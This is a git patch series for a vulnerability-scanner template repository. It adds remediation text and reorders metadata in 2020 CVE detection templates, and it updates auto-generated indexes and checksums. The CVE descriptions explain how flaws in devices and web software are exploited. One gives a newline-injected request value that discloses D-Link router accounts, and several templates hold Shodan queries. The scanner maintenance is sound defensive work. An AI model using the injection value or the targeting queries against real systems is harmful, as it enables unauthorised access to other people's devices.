1b7f6ecceb..b47c3ae446 100644 --- a/http/cves/2020/CVE-2020-9036.yaml +++ b/http/cves/2020/CVE-2020-9036.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Jeedom through 4.0.38 contains a cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. + remediation: | + Upgrade Jeedom to version 4.0.39 or later to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2020-08-05-cve-2020-9036-jeedom-xss-leading-to-remote-code-execution/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9036 @@ -14,8 +16,8 @@ info: cve-id: CVE-2020-9036 cwe-id: CWE-79 epss-score: 0.00113 - cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* epss-percentile: 0.44064 + cpe: cpe:2.3:a:jeedom:jeedom:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jeedom diff --git a/http/cves/2020/CVE-2020-9043.yaml b/http/cves/2020/CVE-2020-9043.yaml index f65a4be134..c2d504a9fa 100644 --- a/http/cves/2020/CVE-2020-9043.yaml +++ b/http/cves/2020/CVE-2020-9043.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress wpCentral plugin before 1.5.1 is susceptible to information disclosure. An attacker can access the connection key for WordPress Admin account and thus potentially obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update the wpCentral plugin to version 1.5.1 or later to fix the information disclosure vulnerability. reference: - https://wpscan.com/vulnerability/10074 - https://www.wordfence.com/blog/2020/02/vulnerability-in-wpcentral-plugin-leads-to-privilege-escalation/ @@ -18,14 +20,14 @@ info: cve-id: CVE-2020-9043 cwe-id: CWE-200 epss-score: 0.04173 - cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* epss-percentile: 0.91091 + cpe: cpe:2.3:a:wpcentral:wpcentral:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: wpcentral product: wpcentral + framework: wordpress tags: wordpress,wp-plugin,wpcentral,authenticated,wp,wpscan,cve,cve2020 http: diff --git a/http/cves/2020/CVE-2020-9047.yaml b/http/cves/2020/CVE-2020-9047.yaml index f92e7f7b29..92307bd5b9 100644 --- a/http/cves/2020/CVE-2020-9047.yaml +++ b/http/cves/2020/CVE-2020-9047.yaml @@ -6,6 +6,8 @@ info: severity: high description: | exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system. + remediation: | + Apply the latest security patch or update provided by the vendor to fix the vulnerability. reference: - https://github.com/norrismw/CVE-2020-9047 - https://www.johnsoncontrols.com/cyber-solutions/security-advisories @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-9047 cwe-id: CWE-347 epss-score: 0.01182 - cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:* epss-percentile: 0.83293 + cpe: cpe:2.3:a:johnsoncontrols:exacqvision_enterprise_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: johnsoncontrols diff --git a/http/cves/2020/CVE-2020-9054.yaml b/http/cves/2020/CVE-2020-9054.yaml index 5ce0e5d7c7..d939ef62f2 100644 --- a/http/cves/2020/CVE-2020-9054.yaml +++ b/http/cves/2020/CVE-2020-9054.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: critical description: 'Multiple Zyxel network-attached storage (NAS) devices running firmware version 5.21 contain a pre-authentication command injection vulnerability, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable device. Zyxel NAS devices achieve authentication by using the weblogin.cgi CGI executable. This program fails to properly sanitize the username parameter that is passed to it. If the username parameter contains certain characters, it can allow command injection with the privileges of the web server that runs on the Zyxel device. Although the web server does not run as the root user, Zyyxel devices include a setuid utility that can be leveraged to run any command with root privileges. As such, it should be assumed that exploitation of this vulnerability can lead to remote code execution with root privileges. By sending a specially-crafted HTTP POST or GET request to a vulnerable Zyyxel device, a remote, unauthenticated attacker may be able to execute arbitrary code on the device. This may happen by directly connecting to a device if it is directly exposed to an attacker. However, there are ways to trigger such crafted requests even if an attacker does not have direct connectivity to a vulnerable devices. For example, simply visiting a website can result in the compromise of any Zyyxel device that is reachable from the client system. Affected products include: NAS326 before firmware V5.21(AAZF.7)C0 NAS520 before firmware V5.21(AASZ.3)C0 NAS540 before firmware V5.21(AATB.4)C0 NAS542 before firmware V5.21(ABAG.4)C0 Zyyxel has made firmware updates available for NAS326, NAS520, NAS540, and NAS542 devices. Affected models that are end-of-support: NSA210, NSA220, NSA220+, NSA221, NSA310, NSA310S, NSA320, NSA320S, NSA325 and NSA325v2.' + remediation: | + Apply the latest firmware update provided by Zyxel to mitigate this vulnerability. reference: - https://krebsonsecurity.com/2020/02/zyxel-fixes-0day-in-network-storage-devices/ - https://www.zyxel.com/support/remote-code-execution-vulnerability-of-NAS-products.shtml @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-9054 cwe-id: CWE-78 epss-score: 0.97346 - cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.99831 + cpe: cpe:2.3:o:zyxel:nas326_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2020/CVE-2020-9315.yaml b/http/cves/2020/CVE-2020-9315.yaml index ec0806dd66..97a2b479ba 100644 --- a/http/cves/2020/CVE-2020-9315.yaml +++ b/http/cves/2020/CVE-2020-9315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE. + remediation: | + Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: - https://www.cvebase.com/cve/2020/9315 - https://www.oracle.com/support/lifetime-support/ @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-9315 cwe-id: CWE-306 epss-score: 0.97417 - cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:* epss-percentile: 0.99889 + cpe: cpe:2.3:a:oracle:iplanet_web_server:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2020/CVE-2020-9344.yaml b/http/cves/2020/CVE-2020-9344.yaml index e13009bbcf..636e3f7b4a 100644 --- a/http/cves/2020/CVE-2020-9344.yaml +++ b/http/cves/2020/CVE-2020-9344.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: Jira Subversion ALM for Enterprise before 8.8.2 contains a cross-site scripting vulnerability at multiple locations. + remediation: | + Upgrade Jira Subversion ALM for Enterprise to version 8.8.2 or later to mitigate this vulnerability. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9344 - https://kintosoft.atlassian.net/wiki/spaces/SVNALM/pages/753565697/Security+Bulletin @@ -16,14 +18,14 @@ info: cve-id: CVE-2020-9344 cwe-id: CWE-79 epss-score: 0.00205 - cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* epss-percentile: 0.57744 + cpe: cpe:2.3:a:atlassian:subversion_application_lifecycle_management:*:*:*:*:*:*:*:* metadata: - max-request: 5 verified: true - shodan-query: http.component:"Atlassian Jira" + max-request: 5 vendor: atlassian product: subversion_application_lifecycle_management + shodan-query: http.component:"Atlassian Jira" tags: cve,cve2020,atlassian,jira,xss http: diff --git a/http/cves/2020/CVE-2020-9376.yaml b/http/cves/2020/CVE-2020-9376.yaml index 38c375ceb1..311de84011 100644 --- a/http/cves/2020/CVE-2020-9376.yaml +++ b/http/cves/2020/CVE-2020-9376.yaml @@ -7,6 +7,8 @@ info: description: | D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. + remediation: | + Apply the latest firmware update provided by D-Link to fix the vulnerability. reference: - https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182 @@ -18,8 +20,8 @@ info: cve-id: CVE-2020-9376 cwe-id: CWE-74 epss-score: 0.9701 - cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* epss-percentile: 0.99626 + cpe: cpe:2.3:o:dlink:dir-610_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2020/CVE-2020-9402.yaml b/http/cves/2020/CVE-2020-9402.yaml index e0c29211b9..44c5606cec 100644 --- a/http/cves/2020/CVE-2020-9402.yaml +++ b/http/cves/2020/CVE-2020-9402.yaml @@ -5,21 +5,21 @@ info: author: geeknik severity: high description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. + remediation: Upgrade to the latest version. reference: - https://www.debian.org/security/2020/dsa-4705 - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 - https://docs.djangoproject.com/en/3.0/releases/security/ - https://nvd.nist.gov/vuln/detail/CVE-2020-9402 - https://groups.google.com/forum/#!topic/django-announce/fLUh_pOaKrY - remediation: Upgrade to the latest version. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2020-9402 cwe-id: CWE-89 epss-score: 0.31262 - cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* epss-percentile: 0.96404 + cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject diff --git a/http/cves/2020/CVE-2020-9425.yaml b/http/cves/2020/CVE-2020-9425.yaml index 8a6b69ecb2..e3811e3404 100644 --- a/http/cves/2020/CVE-2020-9425.yaml +++ b/http/cves/2020/CVE-2020-9425.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response. + remediation: | + Upgrade rConfig to version 3.9.4 or later to fix the vulnerability. reference: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-9425 cwe-id: CWE-670 epss-score: 0.01611 - cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* epss-percentile: 0.85844 + cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: rconfig diff --git a/http/cves/2020/CVE-2020-9483.yaml b/http/cves/2020/CVE-2020-9483.yaml index 060f52fddf..58dd7452b9 100644 --- a/http/cves/2020/CVE-2020-9483.yaml +++ b/http/cves/2020/CVE-2020-9483.yaml @@ -6,6 +6,8 @@ info: severity: high description: | When using H2/MySQL/TiDB as Apache SkyWalking storage and a metadata query through GraphQL protocol, there is a SQL injection vulnerability which allows access to unexpected data. Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0 H2/MySQL/TiDB storage implementations don't use the appropriate way to set SQL parameters. + remediation: | + Apply the latest security patches or updates provided by the SkyWalking project to fix the SQL injection vulnerability. reference: - https://github.com/apache/skywalking/pull/4639 - https://nvd.nist.gov/vuln/detail/CVE-2020-9483 @@ -15,8 +17,8 @@ info: cve-id: CVE-2020-9483 cwe-id: CWE-89 epss-score: 0.05987 - cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* epss-percentile: 0.92516 + cpe: cpe:2.3:a:apache:skywalking:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-9484.yaml b/http/cves/2020/CVE-2020-9484.yaml index 8609d28b04..fcaaa6ee5c 100644 --- a/http/cves/2020/CVE-2020-9484.yaml +++ b/http/cves/2020/CVE-2020-9484.yaml @@ -11,6 +11,8 @@ info: c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and d) the attacker knows the relative file path from the storage location used by FileStore to the file the attacker has control over; then, using a specifically crafted request, the attacker will be able to trigger remote code execution via deserialization of the file under their control. Note that all of conditions a) to d) must be true for the attack to succeed. + remediation: | + Apply the latest security patches provided by Apache to mitigate this vulnerability. reference: - http://packetstormsecurity.com/files/157924/Apache-Tomcat-CVE-2020-9484-Proof-Of-Concept.html - https://nvd.nist.gov/vuln/detail/CVE-2020-9484 @@ -23,13 +25,13 @@ info: cve-id: CVE-2020-9484 cwe-id: CWE-502 epss-score: 0.97119 - cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* epss-percentile: 0.9968 + cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat + shodan-query: title:"Apache Tomcat" tags: rce,packetstorm,cve,cve2020,apache,tomcat http: diff --git a/http/cves/2020/CVE-2020-9496.yaml b/http/cves/2020/CVE-2020-9496.yaml index 7368c19433..d0cb28604c 100644 --- a/http/cves/2020/CVE-2020-9496.yaml +++ b/http/cves/2020/CVE-2020-9496.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: medium description: Apache OFBiz 17.12.03 contains cross-site scripting and unsafe deserialization vulnerabilities via an XML-RPC request. + remediation: | + Apply the latest security patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-9496 cwe-id: CWE-502 epss-score: 0.975 - cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:* epss-percentile: 0.99963 + cpe: cpe:2.3:a:apache:ofbiz:17.12.03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache diff --git a/http/cves/2020/CVE-2020-9757.yaml b/http/cves/2020/CVE-2020-9757.yaml index 0d11179600..148644ebc1 100644 --- a/http/cves/2020/CVE-2020-9757.yaml +++ b/http/cves/2020/CVE-2020-9757.yaml @@ -5,6 +5,8 @@ info: author: dwisiswant0 severity: critical description: Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller. + remediation: | + Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability. reference: - https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md - https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt @@ -17,8 +19,8 @@ info: cve-id: CVE-2020-9757 cwe-id: CWE-74 epss-score: 0.97161 - cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* epss-percentile: 0.99705 + cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: craftcms diff --git a/http/cves/2021/CVE-2021-46073.yaml b/http/cves/2021/CVE-2021-46073.yaml index 628138141b..e1b46b8cd4 100644 --- a/http/cves/2021/CVE-2021-46073.yaml +++ b/http/cves/2021/CVE-2021-46073.yaml @@ -7,7 +7,7 @@ info: description: | Vehicle Service Management System 1.0 contains a cross-site scripting vulnerability via the User List section in login panel. remediation: | - To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. Additionally, web application firewalls (WAFs) can be employed to detect and block XSS attacks. + Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/plsanu/Vehicle-Service-Management-System-User-List-Stored-Cross-Site-Scripting-XSS - https://www.plsanu.com/vehicle-service-management-system-user-list-stored-cross-site-scripting-xss From 9a64ff8312a4431e53ad1e0340e18bf287fde09f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 12:48:44 +0000 Subject: [PATCH 0193/1090] Auto Generated New Template Addition List [Wed Sep 6 12:48:44 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0e876f0438..c4e4a57530 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ http/cves/2023/CVE-2023-32563.yaml http/cves/2023/CVE-2023-34124.yaml http/cves/2023/CVE-2023-34192.yaml http/cves/2023/CVE-2023-36844.yaml +http/cves/2023/CVE-2023-39361.yaml http/cves/2023/CVE-2023-4634.yaml http/exposed-panels/aspcms-backend-panel.yaml http/exposed-panels/greenbone-panel.yaml From 6df09d4048a08ab06a74d1731d385b19ffaf68ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 12:48:56 +0000 Subject: [PATCH 0194/1090] Auto Generated Templates Checksum [Wed Sep 6 12:48:56 UTC 2023] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index abb4725582..55e5e16492 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2632,6 +2632,7 @@ http/cves/2023/CVE-2023-39120.yaml:c2e5b3bd997e2b6cb63530cc9c7bf1d0cce6e0b7 http/cves/2023/CVE-2023-39141.yaml:ddb042a08cb413a97f662fbc0aa107a5d4a5574a http/cves/2023/CVE-2023-39143.yaml:57dbbf664e21aed709d1d1001b3c2f81d42ee9a4 http/cves/2023/CVE-2023-3936.yaml:718e00aebfd9ba084426938d53da33c2b084fc42 +http/cves/2023/CVE-2023-39361.yaml:027864ed06754ef87a7de376519681d526b46eb6 http/cves/2023/CVE-2023-4173.yaml:add4098ac7435ecc0fc9c55e00232d441b522a1f http/cves/2023/CVE-2023-4174.yaml:1902cb27adf5853b7f3cd5312963e6dddfb2a298 http/cves/2023/CVE-2023-4634.yaml:52424e8bdbd08b6d9cea82d086b21ca1b9e109ee @@ -7048,7 +7049,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:53e9aaf9a6d37d16ff90663d53f2c58919c29f55 +templates-checksum.txt:c9397bfe7331e6073a54092c3c9978ac5484cbe8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From ff31fa788248d61b0ad2876e3b720ff94e306670 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 6 Sep 2023 12:50:06 +0000 Subject: [PATCH 0195/1090] Auto Generated cves.json [Wed Sep 6 12:50:06 UTC 2023] :robot: --- cves.json | 1 + cves.json-checksum.txt | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index 9d6aeb2785..34f5a4bcf2 100644 --- a/cves.json +++ b/cves.json @@ -2010,6 +2010,7 @@ {"ID":"CVE-2023-39141","Info":{"Name":"Aria2 WebUI - Path traversal","Severity":"high","Description":"webui-aria2 commit 4fe2e was discovered to contain a path traversal vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39141.yaml"} {"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} {"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} +{"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index a5a83e3322..d1cf7c82fb 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -bf4766f6ec2eca9601df9f6f4b11e620 +360a3fb55fc30d1c7add0d19334c6316 From a92ce6783f72011ce4abed701100be100dcd9d28 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 6 Sep 2023 18:23:28 +0530 Subject: [PATCH 0196/1090] updated 2019 CVEs --- http/cves/2019/CVE-2019-0193.yaml | 6 +++--- http/cves/2019/CVE-2019-0221.yaml | 6 ++++-- http/cves/2019/CVE-2019-0230.yaml | 4 +++- http/cves/2019/CVE-2019-10068.yaml | 4 +++- http/cves/2019/CVE-2019-10092.yaml | 4 +++- http/cves/2019/CVE-2019-10098.yaml | 4 +++- http/cves/2019/CVE-2019-1010287.yaml | 6 ++++-- http/cves/2019/CVE-2019-1010290.yaml | 4 +++- http/cves/2019/CVE-2019-10232.yaml | 4 +++- http/cves/2019/CVE-2019-10405.yaml | 6 ++++-- http/cves/2019/CVE-2019-10475.yaml | 6 ++++-- http/cves/2019/CVE-2019-10692.yaml | 8 +++++--- http/cves/2019/CVE-2019-10717.yaml | 8 +++++--- http/cves/2019/CVE-2019-10758.yaml | 8 ++++---- http/cves/2019/CVE-2019-11013.yaml | 4 +++- http/cves/2019/CVE-2019-11248.yaml | 4 +++- http/cves/2019/CVE-2019-11370.yaml | 8 +++++--- http/cves/2019/CVE-2019-11510.yaml | 4 +++- http/cves/2019/CVE-2019-11580.yaml | 6 ++++-- http/cves/2019/CVE-2019-11581.yaml | 6 ++++-- http/cves/2019/CVE-2019-11869.yaml | 6 ++++-- http/cves/2019/CVE-2019-12276.yaml | 6 +++--- http/cves/2019/CVE-2019-12314.yaml | 4 +++- http/cves/2019/CVE-2019-12461.yaml | 4 +++- http/cves/2019/CVE-2019-12581.yaml | 6 ++++-- http/cves/2019/CVE-2019-12583.yaml | 4 +++- http/cves/2019/CVE-2019-12593.yaml | 8 +++++--- http/cves/2019/CVE-2019-12616.yaml | 4 +++- http/cves/2019/CVE-2019-12725.yaml | 4 ++-- http/cves/2019/CVE-2019-12962.yaml | 8 +++++--- http/cves/2019/CVE-2019-12985.yaml | 6 ++++-- http/cves/2019/CVE-2019-12986.yaml | 6 ++++-- http/cves/2019/CVE-2019-12987.yaml | 6 ++++-- http/cves/2019/CVE-2019-12988.yaml | 6 ++++-- http/cves/2019/CVE-2019-12990.yaml | 6 ++++-- http/cves/2019/CVE-2019-13101.yaml | 4 +++- http/cves/2019/CVE-2019-13392.yaml | 4 +++- http/cves/2019/CVE-2019-13396.yaml | 4 +++- http/cves/2019/CVE-2019-13462.yaml | 4 +++- http/cves/2019/CVE-2019-14205.yaml | 6 ++++-- http/cves/2019/CVE-2019-14223.yaml | 4 +++- http/cves/2019/CVE-2019-14251.yaml | 4 +++- http/cves/2019/CVE-2019-14312.yaml | 4 +++- http/cves/2019/CVE-2019-14322.yaml | 4 +++- http/cves/2019/CVE-2019-14470.yaml | 4 +++- http/cves/2019/CVE-2019-14530.yaml | 6 ++++-- http/cves/2019/CVE-2019-14696.yaml | 4 +++- http/cves/2019/CVE-2019-14750.yaml | 6 ++++-- http/cves/2019/CVE-2019-14789.yaml | 8 +++++--- http/cves/2019/CVE-2019-14974.yaml | 4 +++- http/cves/2019/CVE-2019-15043.yaml | 8 ++++---- http/cves/2019/CVE-2019-15107.yaml | 4 +++- http/cves/2019/CVE-2019-15501.yaml | 8 +++++--- http/cves/2019/CVE-2019-15642.yaml | 8 +++++--- http/cves/2019/CVE-2019-15713.yaml | 6 ++++-- http/cves/2019/CVE-2019-15811.yaml | 6 ++++-- http/cves/2019/CVE-2019-15858.yaml | 6 ++++-- http/cves/2019/CVE-2019-15859.yaml | 4 +++- http/cves/2019/CVE-2019-15889.yaml | 6 ++++-- http/cves/2019/CVE-2019-16057.yaml | 8 +++++--- http/cves/2019/CVE-2019-16097.yaml | 4 ++-- http/cves/2019/CVE-2019-16123.yaml | 4 +++- http/cves/2019/CVE-2019-16278.yaml | 4 +++- http/cves/2019/CVE-2019-16313.yaml | 4 +++- http/cves/2019/CVE-2019-16332.yaml | 6 ++++-- http/cves/2019/CVE-2019-16525.yaml | 6 ++++-- http/cves/2019/CVE-2019-1653.yaml | 6 +++--- http/cves/2019/CVE-2019-16662.yaml | 4 +++- http/cves/2019/CVE-2019-16759.yaml | 8 +++++--- http/cves/2019/CVE-2019-16920.yaml | 4 +++- http/cves/2019/CVE-2019-16931.yaml | 8 +++++--- http/cves/2019/CVE-2019-16932.yaml | 6 ++++-- http/cves/2019/CVE-2019-16996.yaml | 4 +++- http/cves/2019/CVE-2019-16997.yaml | 4 +++- http/cves/2019/CVE-2019-17270.yaml | 4 +++- http/cves/2019/CVE-2019-17382.yaml | 4 +++- http/cves/2019/CVE-2019-17418.yaml | 4 +++- http/cves/2019/CVE-2019-17444.yaml | 6 ++++-- http/cves/2019/CVE-2019-17503.yaml | 4 +++- http/cves/2019/CVE-2019-17506.yaml | 4 +++- http/cves/2019/CVE-2019-17538.yaml | 4 +++- http/cves/2019/CVE-2019-17558.yaml | 4 +++- http/cves/2019/CVE-2019-17574.yaml | 10 ++++++---- http/cves/2019/CVE-2019-17662.yaml | 8 +++++--- http/cves/2019/CVE-2019-1821.yaml | 6 ++++-- http/cves/2019/CVE-2019-18371.yaml | 4 +++- http/cves/2019/CVE-2019-18393.yaml | 4 +++- http/cves/2019/CVE-2019-18394.yaml | 4 +++- http/cves/2019/CVE-2019-18665.yaml | 4 +++- http/cves/2019/CVE-2019-18818.yaml | 4 +++- http/cves/2019/CVE-2019-18922.yaml | 4 +++- http/cves/2019/CVE-2019-18957.yaml | 4 ++-- http/cves/2019/CVE-2019-1898.yaml | 6 ++++-- http/cves/2019/CVE-2019-19134.yaml | 6 ++++-- http/cves/2019/CVE-2019-19368.yaml | 4 +++- http/cves/2019/CVE-2019-1943.yaml | 10 ++++++---- http/cves/2019/CVE-2019-19781.yaml | 4 +++- http/cves/2019/CVE-2019-19824.yaml | 4 +++- http/cves/2019/CVE-2019-19908.yaml | 8 +++++--- http/cves/2019/CVE-2019-19985.yaml | 6 ++++-- http/cves/2019/CVE-2019-20085.yaml | 4 +++- http/cves/2019/CVE-2019-20141.yaml | 6 ++++-- http/cves/2019/CVE-2019-20183.yaml | 4 +++- http/cves/2019/CVE-2019-20210.yaml | 6 ++++-- http/cves/2019/CVE-2019-20224.yaml | 4 ++-- http/cves/2019/CVE-2019-20933.yaml | 8 ++++---- http/cves/2019/CVE-2019-2578.yaml | 4 +++- http/cves/2019/CVE-2019-2579.yaml | 4 +++- http/cves/2019/CVE-2019-2588.yaml | 4 +++- http/cves/2019/CVE-2019-2616.yaml | 4 +++- http/cves/2019/CVE-2019-2725.yaml | 4 +++- http/cves/2019/CVE-2019-2729.yaml | 4 +++- http/cves/2019/CVE-2019-2767.yaml | 4 +++- http/cves/2019/CVE-2019-3396.yaml | 6 ++++-- http/cves/2019/CVE-2019-3398.yaml | 4 +++- http/cves/2019/CVE-2019-3401.yaml | 8 ++++---- http/cves/2019/CVE-2019-3402.yaml | 8 +++++--- http/cves/2019/CVE-2019-3403.yaml | 6 ++++-- 